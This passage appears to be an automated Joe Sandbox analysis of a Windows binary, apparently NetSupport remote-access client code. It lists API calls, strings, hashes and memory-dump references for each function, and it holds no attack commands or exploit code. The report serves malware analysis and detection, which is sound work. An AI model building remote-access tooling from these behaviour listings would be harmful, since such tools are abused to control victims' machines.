                                                                                          • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                        • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                        • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                        • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                        • API String ID: 1108920153-1959555903
                                                                                        • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                        • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                        • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                        • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                        Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11031926
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                        • String ID: %s%s.bin$016477$clientinv.cpp$m_pDoInv == NULL
                                                                                        • API String ID: 4180936305-3600184544
                                                                                        • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                        • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                        • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                        • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                        Function 11144670 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                        • __strdup.LIBCMT ref: 111446A7
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                          • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                        • _free.LIBCMT ref: 111446DC
                                                                                          • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                          • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                        • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 398584587-0
                                                                                        • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                        • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                        • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                        • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                        Function 1100ED70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                          • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                        • _free.LIBCMT ref: 1100EDB4
                                                                                          • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                          • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                        • _free.LIBCMT ref: 1100EDC7
                                                                                        • _free.LIBCMT ref: 1100EDDA
                                                                                        • _free.LIBCMT ref: 1100EDED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                        • String ID:
                                                                                        • API String ID: 3515823920-0
                                                                                        • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                        • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                        • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                        • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                        Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                          • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                          • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                        • wsprintfA.USER32 ref: 1114593E
                                                                                        • wsprintfA.USER32 ref: 11145954
                                                                                          • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                          • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                          • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                        • API String ID: 3779116287-2600120591
                                                                                        • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                        • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                        • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                        • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                        Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile$CloseHandle
                                                                                        • String ID: "
                                                                                        • API String ID: 1443461169-123907689
                                                                                        • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                        • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                        • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                        • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                        Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,1B492F88,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                        • String ID: Client$DisableGeolocation
                                                                                        • API String ID: 3315423714-4166767992
                                                                                        • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                        • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                        • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                        • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                        Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                          • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                          • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                          • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                          • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                        • TranslateMessage.USER32(?), ref: 110271F0
                                                                                        • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                        • API String ID: 3212272093-2210386016
                                                                                        • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                        • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                        • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                        • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                        Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 110173FD
                                                                                          • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 1101733C
                                                                                          • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                          • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                          • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                          • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 11017252
                                                                                          • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                          • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                          • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                        • SetEvent.KERNEL32(000002FC), ref: 1101741D
                                                                                        • GetTickCount.KERNEL32 ref: 11017423
                                                                                        Strings
                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                        • API String ID: 3804766296-4122679463
                                                                                        • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                        • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                        • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                        • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                        Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                        • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                        Strings
                                                                                        Memory Dump Source
